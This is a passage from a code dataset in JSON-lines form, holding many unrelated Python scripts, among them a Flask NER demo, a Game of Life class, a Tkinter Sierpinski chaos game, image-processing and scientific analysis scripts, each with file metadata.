my_params.get('train')\n val_list = my_params.get('val')\n test_list = my_params.get('test')\n later_fusion_repeat = int(my_params.get('later_fusion_repeat'))\n later_fusion_features = {}\n for j in range(later_fusion_repeat):\n late_fusion = np.zeros((2935, 1))\n\n for f_t in feature_types:\n with open('../best/' + f_t + '_best_' + str(j) + '.pkl', 'rb') as f:\n model = pickle.load(f)\n for i in range(3):\n vector = np.concatenate((model.train_result[i].reshape(-1, 1), model.val_result[i].reshape(-1, 1)), axis=0)\n vector = np.concatenate((vector, model.test_result[i].reshape(-1, 1)), axis=0)\n late_fusion = np.concatenate((late_fusion, vector), axis=1)\n\n late_fusion = late_fusion[:, 1:]\n \n files = [train_list, val_list, test_list]\n base = 0\n tracker = 0\n for lst in files:\n with open(lst, 'r') as f:\n for i, line in enumerate(f.readlines()):\n name = line.replace('\\n','').split(' ')[0]\n if name in later_fusion_features.keys():\n later_fusion_features[name] = np.concatenate((later_fusion_features[name], late_fusion[i + base].reshape(1, -1)), axis=1)\n else:\n later_fusion_features[name] = late_fusion[i + base].reshape(1, -1)\n tracker = i+base\n base = tracker+1\n\n with open('../../features/later_fusion_features.pkl', 'wb') as f:\n pickle.dump(later_fusion_features, f)\n\n\n\n ","sub_path":"hw3_code/scripts/create_later_fusion_features.py","file_name":"create_later_fusion_features.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610195389","text":"\"\"\"\nA module for setting matplotlib foreground and background colors (can do\nwhite-on-black)\n\nFrom:\nhttps://gist.github.com/jasonmc/1160951\n\"\"\"\n\n\ndef set_foregroundcolor(ax, color):\n '''For the specified axes, sets the color of the frame, major ticks,\n tick labels, axis labels, title and legend\n '''\n for tl in (ax.get_xticklines() + ax.get_yticklines()\n + ax.xaxis.get_minorticklines()\n +
ax.yaxis.get_minorticklines()):\n tl.set_color(color)\n for spine in ax.spines:\n ax.spines[spine].set_edgecolor(color)\n for tick in ax.xaxis.get_major_ticks():\n tick.label1.set_color(color)\n for tick in ax.xaxis.get_minor_ticks():\n tick.label1.set_color(color)\n for tick in ax.yaxis.get_major_ticks():\n tick.label1.set_color(color)\n ax.axes.xaxis.label.set_color(color)\n ax.axes.yaxis.label.set_color(color)\n ax.axes.xaxis.get_offset_text().set_color(color)\n ax.axes.yaxis.get_offset_text().set_color(color)\n ax.axes.title.set_color(color)\n lh = ax.get_legend()\n if lh is not None:\n lh.get_title().set_color(color)\n lh.legendPatch.set_edgecolor('none')\n labels = lh.get_texts()\n for lab in labels:\n lab.set_color(color)\n for tl in ax.get_xticklabels():\n tl.set_color(color)\n for tl in ax.get_yticklabels():\n tl.set_color(color)\n\n\ndef set_backgroundcolor(ax, color):\n '''Sets the background color of the current axes (and legend).\n Use 'None' (with quotes) for transparent. To get transparent\n background on saved figures, use:\n pp.savefig(\"fig1.svg\", transparent=True)\n '''\n ax.patch.set_facecolor(color)\n lh = ax.get_legend()\n if lh is not None:\n lh.legendPatch.set_facecolor(color)\n","sub_path":"setcolor.py","file_name":"setcolor.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131039595","text":"from flask import Flask, render_template, request\nfrom bert import Ner\n\nmodel = Ner(\"out/\")\napp = Flask(__name__)\napp.jinja_env.filters['zip'] = zip\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/process', methods=[\"POST\"])\ndef process():\n if request.method == 'POST':\n rawtext = request.form['rawtext']\n output = model.predict(rawtext)\n entities = []\n tags = []\n scores = []\n print(output)\n for word, tag in output.items():\n if tag['tag'] != 'O':\n entities.append(word)\n tags.append(tag['tag'])\n scores.append(tag['confidence'])\n return render_template(\"index.html\", entities=entities, tags=tags, scores=scores, num_of_results=len(entities), text=rawtext)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"230593897","text":"import optparse\nimport os\nimport sys\nimport textwrap\nimport time\n\nimport objc\n\nfrom . import parsing, storage, xcode\n\nopt_parser = optparse.OptionParser()\nopt_parser.add_option(\n \"-f\",\n \"--framework\",\n dest=\"framework\",\n help=\"parse framework FRAMEWORK\",\n metavar=\"FRAMEWORK\",\n)\nopt_parser.add_option(\n \"--start-header\",\n dest=\"start_header\",\n help=\"use '#import <HEADER>
' to load the framework\",\n metavar=\"HEADER\",\n)\nopt_parser.add_option(\n \"--sdk-root\", dest=\"sdk_root\", help=\"Use the given SDK\", metavar=\"DIR\", default=\"/\"\n)\nopt_parser.add_option(\n \"--arch\",\n dest=\"arch\",\n help=\"Use the given processor architecture\",\n metavar=\"ARCH\",\n default=\"x86_64\",\n)\nopt_parser.add_option(\n \"-o\",\n \"--output-file\",\n dest=\"output\",\n help=\"Write results to the file\",\n metavar=\"FILE\",\n)\nopt_parser.add_option(\n \"-e\",\n \"--exceptions-file\",\n dest=\"exceptions\",\n help=\"Write exceptions to the file\",\n metavar=\"FILE\",\n)\nopt_parser.add_option(\n \"--pre-header\",\n dest=\"preheaders\",\n default=[],\n action=\"append\",\n help=\"Include header before including framework headers\",\n metavar=\"HEADER\",\n)\nopt_parser.add_option(\n \"--extra-header\",\n dest=\"extraheaders\",\n default=[],\n action=\"append\",\n help=\"Include header after including the main framework header\",\n metavar=\"HEADER\",\n)\n\n\ndef merge_meth_info(current, update):\n for a in update.get(\"args\", ()):\n if a not in current.get(\"args\", ()):\n if \"args\" not in current:\n current[\"args\"] = {}\n current[\"args\"][a] = update[\"args\"][a]\n else:\n current[\"args\"][a].update(update[\"args\"][a])\n if \"retval\" in update:\n if \"retval\" in current:\n current[\"retval\"].update(update[\"retval\"])\n else:\n current[\"retval\"] = update[\"retval\"]\n\n\ndef locate_method(lst, sel):\n for item in lst:\n if item[\"selector\"] == sel:\n return item\n return None\n\n\ndef locate_property(lst, name):\n for item in lst:\n if item[\"name\"] == name:\n return item\n return None\n\n\ndef merge_exceptions(current, updates):\n return\n for funcname, funcdata in updates[\"definitions\"][\"functions\"].items():\n if funcname not in current[\"definitions\"]:\n current[\"definitions\"][\"functions\"][funcname] = funcdata\n\n else:\n merge_meth_info(\n current[\"definitions\"][\"functions\"][funcname], updates[funcdata]\n )\n\n for section in (\"formal_protocols\", \"informal_protocols\", \"classes\"):\n for nm, info in updates[\"definitions\"][section].items():\n if nm not in current[\"definitions\"][section]:\n current[\"definitions\"][section][nm] = info\n else:\n for meth in info.get(\"methods\", ()):\n m = locate_method(\n current[\"definitions\"][section][nm][\"methods\"], meth[\"selector\"]\n )\n if m is None:\n current[\"definitions\"][section][nm][\"methods\"].append(meth)\n else:\n merge_meth_info(m, meth)\n\n for prop in info.get(\"properties\", ()):\n m = locate_property(\n current[\"definitions\"][section][nm][\"properties\"], prop[\"name\"]\n )\n if m is None:\n current[\"definitions\"][section][nm][\"properties\"].append(prop)\n else:\n m.update(prop)\n\n return current\n\n\ndef scan_headers(\n raw_fn,\n exceptions_fn,\n framework,\n start_header,\n preheaders,\n extraheaders,\n sdk_root,\n arch,\n link_framework,\n only_headers,\n # typemap,\n min_deploy,\n verbose=False,\n):\n if start_header is None:\n path = os.path.join(\n sdk_root, \"System\", \"Library\", \"Frameworks\", framework + \".framework\"\n )\n if os.path.exists(path):\n file_archs = xcode.archs_for_framework(path)\n\n else:\n path = objc.dyld_framework(\"Headers\", framework)\n file_archs = xcode.archs_for_framework(path)\n\n if arch not in file_archs:\n print(\n \"Framework %r not available for arch %r\" % (framework, arch),\n file=sys.stderr,\n )\n sys.exit(1)\n\n path = os.path.join(path, \"Headers\")\n if not os.path.exists(path):\n print(f\"Framework without 
headers {path!r}\", file=sys.stderr)\n sys.exit(1)\n\n files = os.listdir(path)\n if len(files) == 1:\n start_header = \"%s/%s\" % (framework, files[0])\n\n else:\n if framework + \".h\" not in files:\n print(\n \"Framework doesn't have a central header <%s/%s.h>\"\n % (framework, framework),\n file=sys.stderr,\n )\n sys.exit(1)\n\n prs = parsing.FrameworkParser(\n framework,\n start_header=start_header,\n sdk=sdk_root,\n arch=arch,\n preheaders=preheaders,\n extraheaders=extraheaders,\n link_framework=link_framework,\n only_headers=only_headers,\n # typemap=typemap,\n min_deploy=min_deploy,\n verbose=verbose,\n )\n\n prs.parse()\n\n if not os.path.exists(os.path.dirname(raw_fn)):\n os.makedirs(os.path.dirname(raw_fn))\n\n cur_time = time.ctime()\n storage.save_framework_info(\n raw_fn,\n textwrap.dedent(\n \"\"\"\\\n // GENERATED FILE DO NOT EDIT\n //\n // This file was generated by objective.metadata\n // Last update: %s\n \"\"\"\n )\n % (cur_time,),\n prs.definitions(),\n )\n\n new_exceptions = prs.exceptions\n if os.path.exists(exceptions_fn):\n cur_exceptions = storage.load_framework_info(exceptions_fn, verbose=verbose)\n new_exceptions = merge_exceptions(cur_exceptions, new_exceptions)\n\n storage.save_framework_info(\n exceptions_fn,\n textwrap.dedent(\n \"\"\"\\\n // objective.metadata exceptions file, see its document\n // for information on how to update this file.\n \"\"\"\n ),\n new_exceptions,\n verbose=verbose,\n )\n","sub_path":"objective/metadata/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"533785909","text":"#!/bin/python\n\"\"\"\n Create a nonuniformity map\n ~~~~~~~~~~~~~~~~~~~~~~\n\n :author: Xu Hangkun (许杭锟)\n :copyright: © 2020 Xu Hangkun \n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport ROOT\nimport argparse\nimport pickle\nimport sys\nsys.path.append(\"/dybfs/users/xuhangkun/SimTAO/offline\")\nfrom TaoDataAPI import TAOData\nfrom math import sqrt,pow\n\nparser = argparse.ArgumentParser(description=\"create the true nonlinearity map\")\nparser.add_argument(\"--input_dir\",default=\"../change_data/nonuniformity/electron_1MeV\")\nparser.add_argument(\"--output\",default=\"./data/result/true_nonuniformity.root\")\nargs = parser.parse_args()\n\ngr = ROOT.TGraph2D()\nn_point=0\nscale = 1.\nfor i in range(11):\n for j in range(13):\n print(\"e_theta%d_r%d.root\"%(9*i,50*j))\n filename=os.path.join(args.input_dir,\"e_theta%d_r%d.root\"%(9*i,50*j))\n data = TAOData([filename])\n hist = ROOT.TH1F(\"hist_%d_%d\"%(i,j),\"hist\",100,3500,5500)\n for k in range(data.GetEntries()):\n data.GetEntry(k)\n edep = data.GetAttr(\"fGdLSEdep\")\n hit = data.GetAttr(\"fNSiPMHit\")\n if edep < 0.999:\n continue\n hist.Fill(hit)\n hist.Fit(\"gaus\")\n if i == 0 and j == 0:\n scale = hist.GetFunction(\"gaus\").GetParameter(1)\n value = hist.GetFunction(\"gaus\").GetParameter(1)/scale\n gr.SetPoint(n_point,9*i,50*j,value)\n n_point += 1\n\nrfile = ROOT.TFile(args.output,\"recreate\")\ngr.Write()\nrfile.Close()\n","sub_path":"SourceDesign/create_true_nu_map.py","file_name":"create_true_nu_map.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"394677698","text":"import sys\n\nstdin = sys.stdin\n\nni = lambda: int(ns())\nna = lambda: list(map(int, ns().split()))\nns = lambda: stdin.readline()\n\na, b = na()\n\nans = 0\nif (a > 0 and a < 10) 
and (b > 0 and b < 10):\n ans = a * b\nelse:\n ans = -1 \n\nprint(ans)\n","sub_path":"abc/abc144/abc144_a.py","file_name":"abc144_a.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"261428072","text":"import pathlib\nimport random\n\nfrom typing import List, Optional, Tuple\n\n\nCell = Tuple[int, int]\nCells = List[int]\nGrid = List[Cells]\n\nclass GameOfLife:\n\n def __init__(self, size, randomize=True, max_generations=None):\n # Size of the cell grid\n self.rows, self.cols = size\n # Previous generation of cells\n self.prev_generation = self.create_grid()\n # Current generation of cells\n self.curr_generation = self.create_grid(randomize=randomize)\n # Maximum number of generations\n self.max_generations = max_generations\n # Current generation count\n self.generations = 1\n\n def create_grid(self, randomize: bool=False) -> Grid:\n grid = [[0]*self.cols for i in range(self.rows)]\n if randomize:\n for i in range(self.rows):\n for j in range(self.cols):\n grid[i][j] = random.randint(0,1)\n return grid\n\n def get_neighbours(self, cell: Cell) -> Cells:\n i, j = cell\n right_wrap = (j + 1)%self.cols\n bot_wrap = (i + 1)%self.rows\n return [(i-1, j-1), (i-1, j), (i-1, right_wrap),\n (i, j-1), (i, right_wrap),\n (bot_wrap, j-1), (bot_wrap, j), (bot_wrap, right_wrap)]\n\n def get_next_generation(self) -> Grid:\n grid = self.curr_generation\n cells_to_update = []\n for i in range(self.rows):\n for j in range(self.cols):\n neighbours = self.get_neighbours((i,j))\n s = sum(grid[n[0]][n[1]] for n in neighbours)\n if grid[i][j] == 0 and s == 3:\n cells_to_update.append((i, j, 1))\n elif grid[i][j] == 1 and (s < 2 or s > 3):\n cells_to_update.append((i, j, 0))\n for c in cells_to_update:\n grid[c[0]][c[1]] = c[2]\n return grid\n\n def step(self) -> None:\n for i in range(self.rows):\n for j in range(self.cols):\n self.prev_generation[i][j] = self.curr_generation[i][j]\n self.curr_generation = self.get_next_generation()\n self.generations += 1\n\n @property\n def is_max_generations_exceeded(self) -> bool:\n return self.max_generations is not None and self.generations >= self.max_generations\n\n @property\n def is_changing(self) -> bool:\n return self.curr_generation != self.prev_generation\n \n\n @staticmethod\n def from_file(filename: pathlib.Path) -> 'GameOfLife':\n with open(filename) as f:\n data = f.read()\n grid = [[int(c) for c in i] for i in data.split()]\n game = GameOfLife((len(grid), len(grid[0])), randomize=False)\n game.curr_generation = grid\n return game\n\n def save(self, filename: pathlib.Path) -> None:\n \"\"\"\n Save the current state of the cells to the specified file.\n \"\"\"\n with open(filename, 'w') as f:\n f.write(\"\\n\".join(\"\".join(str(c) for c in row) for row in self.curr_generation))\n\n\n","sub_path":"homework3/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"225376345","text":"def count_substring(long_str,target):\r\n\tcount = 0\r\n\tfor index in range(len(long_str)-len(target)+1):\r\n\t\tif long_str[index:index+len(target)] == target:\r\n\t\t\tcount+=1\r\n\tprint('{target} is shown in {long_str} {count} times'.format(target=target,long_str=long_str,count=count))\r\ncount_substring('love, love, love, all you need is love', 'love')\r\n\r\n'''\r\ndef count_substring_v1(string, target):\r\n count = 0\r\n index = 0\r\n while index < len(string) - len(target) + 1:\r\n if string[index : index + len(target)] == target:\r\n count += 1\r\n index += 1 # <- look here\r\n return count\r\n\r\ndef count_substring_v2(string, target):\r\n count = 0\r\n index =
0\r\n while index < len(string) - len(target) + 1:\r\n if string[index : index + len(target)] == target:\r\n count += 1\r\n index += len(target) # <- look here\r\n else:\r\n index += 1\r\n return count\r\n'''","sub_path":"10-13_while-count_substring.py","file_name":"10-13_while-count_substring.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"226230523","text":"import numpy as np\nimport cv2\n\ndef pencil(filename, debug, status):\n # learned parameters\n omega1 = 11.0\n omega2 = 37.0\n omega3 = 52.0\n sigmaB = 9.0\n uA = 105.0\n uB = 225.0\n muD = 90.0\n sigmaD = 11.0\n\n # pencil sketch tone distribution\n def p1(v):\n return (1/sigmaB)*np.exp(-(255-v)/sigmaB) if v <= 255 else 0\n\n def p2(v):\n return 1/(uB-uA) if uA <= v <= uB else 0\n\n def p3(v):\n return (1/(np.sqrt(2*np.pi*sigmaD**2)))*np.exp(-(v-muD)**2/(2*sigmaD**2))\n\n img = cv2.imread(filename)\n # img = cv2.imread('sign.jpg')\n img = cv2.cvtColor(img, cv2.cv.CV_BGR2GRAY)\n h, w = img.shape\n\n imgN = np.asarray(img, dtype=np.float32)\n cv2.normalize(imgN,imgN,0,1,cv2.NORM_MINMAX)\n\n dX = np.diff(imgN, axis=0)**2\n dY = np.diff(imgN, axis=1)**2\n dX = np.row_stack((dX, np.ones(w)))\n dY = np.column_stack((dY, np.ones(h)))\n # dX.resize(h, w)\n # dY.resize(h, w)\n G = (dX+dY)**1/2\n\n kSize = min(h,w)/30\n kernel = np.zeros([kSize, kSize])\n # kernel[kSize/2] = np.ones(kSize)\n kernel[:,kSize/2] = np.ones(kSize)\n\n kernels = []\n center = (kSize/2, kSize/2)\n angle = 0.0\n for i in range(8):\n M = cv2.getRotationMatrix2D(center, angle+i*22.5, 1)\n kernels.append(cv2.warpAffine(kernel, M, (kSize, kSize)))\n # kernels.append(cv2.warpAffine(kernel, M, (kSize, kSize), flags=cv2.INTER_NEAREST))\n\n gi = []\n for i in range(8):\n gi.append(cv2.filter2D(G,-1,kernels[i]))\n gi = np.asarray(gi, dtype=np.float32)\n\n ci = []\n for i in range(8):\n status.progress += 10\n current = G.copy()\n ci.append(current)\n it = np.nditer(ci[i], flags=['multi_index'], op_flags=['readwrite'])\n while not it.finished:\n j, k = it.multi_index\n if np.argmax(gi[:,j,k]) != i:\n current[j,k] = 0\n it.iternext()\n\n s = []\n for i in range(8):\n s.append(cv2.filter2D(ci[i],-1,kernels[i]))\n s = np.asarray(s, dtype=np.float32)\n status.progress += 10\n\n # result = sum(s)\n result = np.amax(s, axis=0)\n result[result>1] = 1\n\n cv2.normalize(result,result,0,1,cv2.NORM_MINMAX)\n\n # it = np.nditer(G, flags=['multi_index'], op_flags=['readwrite'])\n # while not it.finished:\n # if (np.argmax(G1[it.multi_index]) < 1 or np.argmax(G1[it.multi_index]) > 2):\n # it[0] = 0\n # it.iternext()\n\n cv2.normalize(result,result,0,255,cv2.NORM_MINMAX)\n result = 255 - result\n result = np.asarray(result, dtype=np.uint8)\n\n status.progress += 10\n\n\n p1 = np.vectorize(p1, otypes=[np.float32])\n p2 = np.vectorize(p2, otypes=[np.float32])\n p3 = np.vectorize(p3, otypes=[np.float32])\n\n img1 = p1(img)\n img2 = p2(img)\n img3 = p3(img)\n\n p = omega1*img1 + omega2*img2 + omega3*img3\n cv2.normalize(p,p,0,255,cv2.NORM_MINMAX)\n p = np.asarray(p, dtype=np.uint8)\n hist = cv2.equalizeHist(p)\n\n status.progress += 10\n\n if debug == 0:\n retval = result + hist\n elif debug == 1:\n retval = result\n else:\n retval = hist\n\n return cv2.cvtColor(retval, cv2.cv.CV_GRAY2RGB)\n # cv2.imwrite('result.jpg', result)\n # cv2.imshow('Pencil Drawing Rendering', hist)\n # 
cv2.waitKey(0)\n","sub_path":"pencil.py","file_name":"pencil.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606153733","text":"def list_search(_list, _string):\n    result = []\n    for i in range(len(_list)):\n        if _list[i].find(_string) != -1:\n            result.append(i)\n    return result\n\n\nif __name__ == '__main__':\n    key_values = {}\n    key = input()\n    value = input()\n    n = int(input())\n    for j in range(n):\n        _input = input().split(' => ')\n        curr_key = _input[0]\n        curr_value = _input[1].split(';')\n        key_values[curr_key] = curr_value\n\n    for kvp in key_values.items():\n        matches = list_search(kvp[1], value)\n        if kvp[0].find(key) != -1:\n            print(f'{kvp[0]}:')\n            if len(matches) > 0:\n                print('-' + '\\n-'.join([str(kvp[1][i]) for i in matches]))\n","sub_path":"Dictioneries/extra_exercises/p01_key-key_value-value.py","file_name":"p01_key-key_value-value.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571314972","text":" ##################################################################################################################################################\n#Name:Sam Evans\n#Date:3/28/20\n#Description:Chaos Game (Sierpinski Triangle)\n##################################################################################################################################################\nfrom Tkinter import *\nfrom random import randint\n#2D Point class\nclass Point(object):\n\tdef __init__ (self, x = 0.0, y = 0.0):\n\t\tself.x = x\n\t\tself.y = y\n    #Decorators \n\t@property\n\tdef x(self):\n\t\treturn self._x\n\t@x.setter\n\tdef x(self, value):\n\t\tself._x = value\n\t@property\n\tdef y(self):\n\t\treturn self._y\n\t@y.setter\n\tdef y(self, value):\n\t\tself._y = value\n    #Distance Formula\n\tdef dist(self, other):\n\t\tdelta_x = (self._x) - (other._x)\n\t\tdelta_y = (self._y) - (other._y)\n\t\treturn (delta_x ** 2 + delta_y ** 2) ** 0.5\n    #Midpoint formula\n\tdef midpt(self, other):\n\t\tx_co = (self._x + other._x)/2\n\t\ty_co = (self._y + other._y)/2\n\t\treturn Point(x_co, y_co)\n    #Magic string function\t\n\tdef __str__(self):\n\t\treturn (\"({}), ({})\").format(self.x, self.y)\n\n# the coordinate system class: (0,0) is in the top-left corner\n# inherits from the Canvas class of Tkinter\nclass ChaosGame(Canvas):\n    POINT_COLOR = [\"red\", \"black\"]\n    POINT_RADIUS = [0, 2]\n    def __init__(self, master):\n        Canvas.__init__(self, master, bg = \"white\")\n        self.pack(fill = BOTH, expand = 1)\n    def plotPoints(self, n):\n        #initial vertices\n        vertices = [Point(MIN_X, MAX_Y), Point(MAX_X, MAX_Y), Point(MID_X, MIN_Y)]\n        points = []\n        #plots the 3 vertices in vertices list\n        for i in vertices:\n            self.plot2(i)\n        #calculates the midpoint of the first two vertices\n        midpt = vertices[0].midpt(vertices[1])\n        points.append(midpt)\n        self.plot(midpt)\n        #calculates the midpoint of the last point and a random vertex, then plots it\n        for i in range (n):\n            midpt2 = points[-1].midpt(vertices[randint(0,(len(vertices)-1))])\n            points.append(midpt2)\n            self.plot(midpt2)\n    def plot(self, other):\n        #color points black with a Radius of 0\n        color = self.POINT_COLOR[1]\n        self.create_oval(other.x, other.y, other.x + self.POINT_RADIUS[0] * 2, other.y + self.POINT_RADIUS[0] * 2, outline=color, fill=color)\n    def plot2(self, other):\n        #color points red with Radius of 2\n        color = self.POINT_COLOR[0]\n        self.create_oval(other.x, other.y, other.x + self.POINT_RADIUS[1] * 
2, other.y + self.POINT_RADIUS[1] * 2, outline=color, fill=color)\n####################################B######################################################################################################\n#main\n#window size\nWIDTH = 600\nHEIGHT = 520\n#number of points\nNUM_POINTS = 50000\n# Min, Mid, and Max x & y values\nMIN_X = 5 \nMAX_X = 595\nMIN_Y = 5\nMAX_Y = 515\nMID_X = (MIN_X + MAX_X)/2\n#tk window \nwindow = Tk()\nwindow.geometry(\"{}x{}\".format(WIDTH,HEIGHT))\n\ns = ChaosGame(window)\ns.plotPoints(NUM_POINTS)\nwindow.mainloop()\n","sub_path":"Chaos game version 1.py","file_name":"Chaos game version 1.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"159159126","text":"\"\"\"\r\nAuthor: Katherine Gerot\r\n\r\nNeural Network practice on xor\r\n\"\"\"\r\nimport numpy, random, os\r\noutput_file = open(\"output_file.txt\", 'w')\r\nlr = 1\r\nbias = 1\r\nweights = [random.random(),random.random(),random.random()]\r\ndef Print_File(*inputs) :\r\n print(*inputs, sep=' ', file=output_file)\r\ndef Scale(p) :\r\n if(p > 0) :\r\n return 1\r\n else :\r\n return 0\r\ndef Weight(a,b) : \r\n return a*weights[0]+b*weights[1]+bias*weights[2]\r\ndef Perceptron(input_one, input_two, output) :\r\n perceptron_output = Weight(input_one,input_two) # weighted sum\r\n perceptron_output = Scale(perceptron_output) # sig scale\r\n err = output - perceptron_output\r\n weights[0] += err * input_one * lr\r\n weights[1] += err * input_two * lr\r\n weights[2] += err * bias * lr\r\n Print_File(perceptron_output, 'e:', err)\r\nPrint_File(\"====================TESTING======================\")\r\nfor i in range(50) :\r\n Perceptron(1,1,1) # True and true\r\n Perceptron(1,0,0) # True and false\r\n Perceptron(0,1,0) # False and true\r\n Perceptron(0,0,0) # True and false\r\nPrint_File(\"======================USER INPUT=====================\")\r\nx = int(input(\"x \"))\r\ny = int(input(\"y \"))\r\nresult = Scale(Weight(x,y))\r\nprint(x, \"AND\", y, \"is\", result)\r\n","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531906643","text":"import os\nimport datetime\nimport numpy as np\nfrom scipy import interpolate\n\nimport readers.ionex as ionex\nfrom constants import TEC_const, c\n\n\ndef get_closest_number(n, m):\n q = int(n / m)\n n1 = m * q\n if (n * m) > 0:\n n2 = m * (q + 1)\n else:\n n2 = m * (q - 1)\n\n return n1, n2\n\n\ndef interpolator(observed, map):\n lat, lon, tec = observed\n\n map_lats = np.array(get_closest_number(lat, 2.5))\n map_lons = np.array(get_closest_number(lon, 5))\n map_lats = np.repeat(map_lats, 2)\n map_lons = np.tile(map_lons, 2)\n map_tec = [map[map_lat][map_lon] for map_lat, map_lon in zip(map_lats, map_lons)]\n my_inter = interpolate.interp2d(map_lons, map_lats, map_tec)\n inter_tec = float(my_inter(lon, lat))\n s = inter_tec - tec\n st = s / TEC_const\n sc = st / c\n print(\n \"{:>20.4f}{:>20.4f}{:>20.4f}{:>20.4f}{:>20.2e}\".format(\n inter_tec, tec, s, st, sc\n )\n )\n\n\ncomparison = {\n \"BOGI\": 3.723,\n \"BOGO\": -4.123,\n \"BOR1\": 19.898,\n \"JOZ2\": 11.385,\n \"JOZE\": -10.638,\n \"LAMA\": 14.441,\n \"WROC\": 19.056,\n}\n\n\ndir = r\"C:\\users\\macie\\Desktop\\ion_map\\ion_map\\TEST_OUT\"\nion_file = r\"C:\\Users\\macie\\Desktop\\ion_map\\tests\\test_files\\igsg0760.15i\"\n\nionex_map = ionex.read(ion_file)\nhour = 
datetime.datetime(2015, 3, 17, 8)\nobs = {}\nfor file in os.listdir(dir):\n site = file[:4]\n if site in comparison:\n obs[site] = []\n file_path = dir + \"\\\\\" + file\n with open(file_path, \"r\") as file:\n lines = file.readlines()\n for line in lines[1:]:\n if line[:20] != r\" 2015/03/17 08:00:00\":\n break\n data = [float(x) for x in line.split()[3:]]\n obs[site].append(data)\n\n# for site in obs:\n# print(site, comparison[site])\n# for o in obs[site]:\n# interpolator(o, ionex_map[hour])\n#\nprint(ionex_map[hour][50])\n","sub_path":"ion_map/inter.py","file_name":"inter.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560822139","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.cygwin-1.7.35-i686/egg/seedbox/db/sqlalchemy/model_util.py\n# Compiled at: 2015-06-14 13:30:57\n\"\"\"\nProvides utilities for managing models\n\"\"\"\nimport logging\nfrom seedbox.db import models as api_model\nfrom seedbox.db.sqlalchemy import models as db_model\nLOG = logging.getLogger(__name__)\n\ndef from_db(db_item):\n \"\"\"Database to Model\n\n Handles the conversion from the database model object to the\n corresponding public facing api model object. If an item has\n a reference to another model object then the call is recursive.\n\n :param db_item: an instance of a database model object\n :returns: an instance of an api model object\n \"\"\"\n if db_item is None:\n return db_item\n else:\n _model = getattr(api_model, db_item.__class__.__name__)\n instance = _model.make_empty()\n for k in instance:\n if k == instance.PK_NAME:\n instance[k] = db_item.get('id')\n else:\n _attr = db_item.get(k)\n if isinstance(_attr, db_model.Base):\n instance[k] = from_db(_attr)\n elif isinstance(_attr, list) and _attr and isinstance(_attr[0], db_model.Base):\n instance[k] = [ from_db(v) for v in _attr ]\n else:\n instance[k] = _attr\n\n return instance\n\n\ndef to_db(api_item, db_item=None):\n \"\"\"Model to database\n\n Handles the conversion from the api model object to the\n corresponding database model object. If an item has\n a reference to another model object then the call is recursive.\n\n :param api_item: an instance of a api model object\n :param db_item: an instance of a database model object that\n is to be updated. 
(optional)\n :returns: an instance of an database model object\n \"\"\"\n if api_item is None:\n return api_item\n else:\n row = db_item\n if row is None:\n _model = getattr(db_model, api_item.__class__.__name__)\n row = _model(id=getattr(api_item, api_item.PK_NAME))\n for k, v in api_item.items():\n if isinstance(v, api_model.Model):\n v = to_db(v)\n elif isinstance(v, list) and v and isinstance(v[0], api_model.Model):\n v = [ to_db(elm) for elm in v ]\n row[k] = v\n\n return row","sub_path":"pycfiles/SeedboxManager-2.3.17-py2.7/model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166621306","text":"from __future__ import division\nimport numpy as np\nimport numpy.random as npr\nimport matplotlib.pyplot as plt\n\nfrom pybasicbayes.distributions import Regression\nfrom pybasicbayes.util.text import progprint_xrange\nfrom pypolyagamma.distributions import BernoulliRegression\nfrom pylds.models import LDS, DefaultPoissonLDS\n\nnpr.seed(0)\n\n# Parameters\nD_obs = 10\nD_latent = 2\nT = 2000\n\n# True LDS Parameters\nmu_init = np.array([0.,1.])\nsigma_init = 0.01*np.eye(2)\n\nA = 0.99*np.array([[np.cos(np.pi/24), -np.sin(np.pi/24)],\n [np.sin(np.pi/24), np.cos(np.pi/24)]])\nsigma_states = 0.01*np.eye(2)\n\nC = np.random.randn(D_obs, D_latent)\nb = -2.0 * np.ones((D_obs, 1))\n\n# Simulate from a Bernoulli LDS\ntruemodel = LDS(\n dynamics_distn=Regression(A=A, sigma=sigma_states),\n emission_distn=BernoulliRegression(D_out=D_obs, D_in=D_latent, 